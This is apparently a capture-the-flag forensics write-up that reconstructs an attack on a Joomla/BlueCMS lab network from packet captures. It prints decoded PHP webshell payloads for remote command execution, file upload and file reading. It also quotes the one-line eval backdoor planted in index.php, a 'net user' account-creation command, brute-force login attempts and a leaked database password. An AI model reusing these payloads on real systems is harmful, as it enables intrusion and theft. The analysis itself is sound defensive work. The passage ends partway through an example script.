Information Security Triathlon Finals (Data Track) Problem 2


All problems: https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00002.md


First, based on a teammate's finding, we identified the attacker's IP: 172.16.10.121
The following command then extracts every HTTP request and response (the BPF expression keeps only TCP segments whose payload length is non-zero):
I wrapped it in a shell script; extracting everything from all the captures took only about two minutes.

tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r 1_00005_20170908171421.pcap > 5

#!/bin/bash
# Dump the payload-carrying TCP segments to/from the attacker out of every pcap
# in the current directory, then concatenate them into one text file.
# BPF: (IP total length - IP header length - TCP header length) != 0 keeps only
# segments that actually carry data, i.e. the HTTP requests and responses.

target_file='http.txt'
target_folder='http'

mkdir -p "${target_folder}"
: > "${target_folder}/${target_file}"

for file in *.pcap; do
    echo "Dumping HTTP packets in ${file}..."
    tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r "${file}" > "${target_folder}/${file}.txt"
    echo "${file} Done!"
done

# only the per-pcap dumps, so the combined file is never appended to itself
for file in "${target_folder}"/*.pcap.txt; do
    cat "${file}" >> "${target_folder}/${target_file}"
done

Doing the same in Wireshark would have taken far longer;
you cannot help admiring how powerful command-line tools are.

Then go into the http folder
and simply grep for the keywords typical of common web attacks.
For example, the following problems:

  1. The IP range the attacker port-scanned on the internal network
    For the first problem: an attacker pivoting into the internal network is likely to use the reGeorg tool,
    whose telltale keywords are tunnel, tunnel.php and tunnel.nosocket.php.
    Try searching for them:
grep -r -n 'tunnel.php' http.txt

Many results like the following show up:

POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21

In fact, anyone familiar with reGeorg can search directly for the keyword:

?cmd=connect&target=

because reGeorg uses this interface whenever it opens a new TCP connection.

grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F ' HTTP' '{print $1}' | sort | uniq | sed 's/\&port\=/ /g'
grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F '&port' '{print $1}' | sort | uniq

Either of these commands yields the answer:

Answer: 192.168.28.120-192.168.28.135

  2. The connection password of the first webshell the attacker used
    Since it is a webshell on a PHP site,
    start by grepping for keywords such as eval / assert:
grep -n 'eval(' [0-9]*.txt

Because the organisers' packet captures are already in chronological order,
the webshell connection password used during the external penetration must be Jshell;
the one used during the internal penetration should be Bshell or cmd_shell.

  3. The connection password of the webshell the attacker used on BlueCMS during the internal penetration
    Answer: Bshell

  4. The IP of the first network adapter of the internal bluecms host
    "Network adapter IP" suggests that the attacker
    ran the system's ipconfig or ifconfig command,
    so grep for those keywords directly.


Answer: 192.168.20.117

It is a Windows server.

  5. The attacker added a user on the internal network; find the username and password
    Since it is a Windows server, the command to add a user is of course net user [USERNAME] [PASSWORD] /add
cat -n http.txt | grep 71202 | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
net user hacker hacker /add

Having got this far, I think it is better not to rush through the questions but to analyse the attacker's whole attack flow first.
Start with the one-line webshells,
beginning with Jshell.

grep 'Jshell=' http.txt | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
#!/usr/bin/env python3
# Decode the Jshell POST bodies produced by the grep pipeline above (saved to a
# file named "shell"). Each body has the form:
#   Jshell=@eval(base64_decode($_POST[z0]));&z0=...&z1=...&z2=...
import base64
import binascii
from urllib.parse import unquote

with open("shell") as f:
    for line in f:
        print("-" * 32)
        data = unquote(line.strip())
        print(data)
        # every parameter after the first is base64: restore the padding the
        # client dropped, and fall back to the raw value when it is not base64
        for part in data.split("&")[1:]:
            key, _, value = part.partition("=")
            value += "=" * (-len(value) % 4)
            try:
                print("%s=%s" % (key, base64.b64decode(value, validate=True).decode("utf-8", "replace")))
            except binascii.Error:
                print("%s=%s" % (key, part.partition("=")[2]))
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// Get OS information and the current user name

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=<base64 payload omitted; decoded below>', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// List every file under the directory C:\\phpstudy\\WWW\\joomla\\
y.P.l.l...Rb.P.......8 12:47:10 1212    0666
LICENSE.txt 2015-09-08 12:47:10 18092   0666
README.txt  2015-09-08 12:47:10 4213    0666
robots.txt  2015-09-08 12:47:10 842 0666
web.config.txt  2015-09-08 12:47:10 1690    0666

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcdHVubmVsLnBocA==', 'z2=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\tunnel.php
z2=
// Upload a file to C:\\phpstudy\\WWW\\joomla\\tunnel.php

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=<base64 payload omitted; decoded below>', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// List every file under the directory C:\\phpstudy\\WWW\\joomla\\

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
// Run the system command netstat -an | find "ESTABLISHED"
strings *.pcap | grep ESTABLISHED
->|  TCP    127.0.0.1:1629         127.0.0.1:3306         ESTABLISHED
  TCP    127.0.0.1:3306         127.0.0.1:1629         ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.115:1628     ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62858    ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62859    ESTABLISHED
  TCP    192.168.20.117:1628    172.16.10.115:80       ESTABLISHED
  TCP    192.168.28.130:2318    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:2322    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:3473    192.168.28.131:21      ESTABLISHED

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&whoami&echo [S]&cd&echo [E]
// Run the system command whoami
admin-6ef5d71ed\administrator

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZpcGNvbmZpZyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&ipconfig&echo [S]&cd&echo [E]
// Run the system command ipconfig
->|
Windows IP Configuration
Ethernet adapter ........ 2:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.20.117
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1
Ethernet adapter ........:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.28.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
[S]
C:\phpstudy\WWW\joomla
[E] 
|<-

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /addd&echo [S]&cd&echo [E]
// Run the system command net user hacker hacker /addd
// Syntax error, the command failed
->|.... /ADDD ......
 
..............:
 
 
NET USER 
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
 
...... NET HELPMSG 3506 ..................
 
[S]

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /add&echo [S]&cd&echo [E]
// Run the system command net user hacker hacker /add
Succeeded

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcY29uZmlndXJhdGlvbi5waHA=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// Read the contents of the file C:\\phpstudy\\WWW\\joomla\\configuration.php
->|<?php
class JConfig {
    public $offline = '0';
    public $offline_message = '.....................<br /> ..................';
    public $display_offline_message = '1';
    public $offline_image = '';
    public $sitename = 'test';
    public $editor = 'tinymce';
    public $captcha = '0';
    public $list_limit = '20';
    public $access = '1';
    public $debug = '0';
    public $debug_lang = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'mysqlpasswd';
    public $db = 'joomla';
    public $dbprefix = 'shf76_';
    public $live_site = '';
    public $secret = 'BjbqVIMNAt3nB7Dc';
    public $gzip = '0';
    public $error_reporting = 'default';
    public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&k
17:22:31.607905 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [.], seq 4381:5841, ack 769, win 63471, length 1460: HTTP
E...|.@........u..
y.P.....T...8P.......eyref=Help{major}{minor}:{keyref}';
    public $ftp_host = '';
    public $ftp_port = '';
    public $ftp_user = '';
    public $ftp_pass = '';
    public $ftp_root = '';
    public $ftp_enable = '0';
    public $offset = 'UTC';
    public $mailonline = '1';
    public $mailer = 'mail';
    public $mailfrom = 'admin@123.com';
    public $fromname = 'test';
    public $sendmail = '/usr/sbin/sendmail';
    public $smtpauth = '0';
    public $smtpuser = '';
    public $smtppass = '';                                                                                                           
    public $smtphost = 'localhost';
    public $smtpsecure = 'none';
    public $smtpport = '25';
    public $caching = '0';
    public $cache_handler = 'file';
    public $cachetime = '15';
    public $MetaDesc = 'sssss';
    public $MetaKeys = '';
    public $MetaTitle = '1';
    public $MetaAuthor = '1';
    public $MetaVersion = '0';
    public $robots = '';
    public $sef = '1';
    public $sef_rewrite = '0';
    public $sef_suffix = '0';
    public $unicodeslugs = '0';
    public $feed_limit = '10';
    public $log_path = 'C:\\phpstudy\\WWW\\joomla/logs';
    public $tmp_path = 'C:\\phpstudy\\WWW\\joomla/tmp';
    public $lifetime = '15';
    public $session_handler = 'database';
    public $memcache_persist = '1';
    public $memcache_compress = '0';
    public $memcache_server_host = 'localhost';
    public $memcache_server_port = '11211';
    public $memcached_persist = '1';
    public $memcached_compress = '0';
    public $memcached_server_host = 'localhost';
    public $memcached_server_port = '11211';
    public $redis_persist = '1';
    public $redis_server_host = 'localhost';
    pub
17:22:31.622948 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [FP.], seq 5841:6540, ack 769, win 63471, length 699: HTTP
E...|.@........u..
y.P.........8P...H^..lic $redis_server_port = '6379';
    public $redis_server_auth = '';
    public $redis_server_db = '0';
    public $proxy_enable = '0';
    public $proxy_host = '';
    public $proxy_port = '';
    public $proxy_user = '';
    public $proxy_pass = '';
    public $massmailoff = '0';
    public $MetaRights = '';
    public $sitename_pagetitles = '0';
    public $force_ssl = '0';
    public $session_memcache_server_host = 'localhost';
   public $session_memcache_server_port = '11211';
   public $session_memcached_server_host = 'localhost';
   public $session_memcached_server_port = '11211';
   public $frontediting = '1';
   public $feed_email = 'author';
   public $cookie_domain = '';
   public $cookie_path = '';
   public $asset_id = '1';
|<-


--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=C:\\\\phpstudy\\\\WWW\\\\joomla\\\\configuration.php']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// Read the contents of the file C:\\phpstudy\\WWW\\joomla\\configuration.php

Let's look at how this Jshell was written to the server.


The first three lines should be the exploitation of the vulnerability that wrote the file contents.


As can be seen, the attacker used the template editor URL

/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA
to edit the index.php file (the file parameter L2luZGV4LnBocA base64-decodes to /index.php)

and inserted one line into index.php:

<?php eval($_POST['Jshell']);?>

Tracing further back: how did the attacker log in?

grep -n -C 32 'POST /administrator/' [0-9]*.txt | grep 'username' | grep -o 'username.*'
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=admin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=apple&lang=&option=com_login&task=login&return=aW5kZXgucGhw&f2426d9ea34e95fe916e6309d7028835=1
username=admin&passwd=apple&option=com_login&task=login&return=aW5kZXgucGhw&2bb30f381fad54b0ca7f4088e7e9cc97=1

So the attacker had brute-forced the administrator password beforehand.
The last two attempts carry the same credentials, admin/apple,
which is very likely the correct password.
Compare the response packets of the earlier attempts with the final one:



When a wrong password is tried, the server returns 303 See Other and redirects to /administrator/index.php;
the content of index.php then contains:


<p class="alert-message">Username and password do not match or you do not have an account yet.</p>

On the genuine successful login the server also returns 303 and redirects to /administrator/index.php,
but the content of index.php is clearly different.


By brute-forcing the password, the attacker obtained the administrator credentials admin/apple.
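Added example (not code from the writeup) that applies the distinction above: because both outcomes answer with a 303, each login POST is paired with the GET of /administrator/index.php that follows it and classified by the alert-message marker, and the failures are then counted as a brute-force indicator. The transactions, passwords and the TOKEN field are constructed.

```python
#!/usr/bin/env python3
"""Classify Joomla administrator login attempts from paired HTTP transactions.

A wrong password and a correct one both get a 303 See Other to
/administrator/index.php, so the status code alone says nothing. The outcome
shows in the page fetched next: a failed attempt renders the alert-message
paragraph, a successful one does not. Pair every login POST with the GET of
index.php that follows it, classify by that marker, and flag brute forcing.
"""
from urllib.parse import parse_qs

FAIL_MARKER = ('<p class="alert-message">Username and password do not match '
               'or you do not have an account yet.</p>')

# Constructed sample, not from the capture: (method, path, request body,
# status, response body). Passwords and the CSRF token are placeholders.
LOGIN = "&option=com_login&task=login&return=aW5kZXgucGhw&TOKEN=1"
FAIL_PAGE = "<html>" + FAIL_MARKER + "</html>"
SAMPLE = [
    ("POST", "/administrator/index.php", "username=admin&passwd=wrong1" + LOGIN, 303, ""),
    ("GET", "/administrator/index.php", "", 200, FAIL_PAGE),
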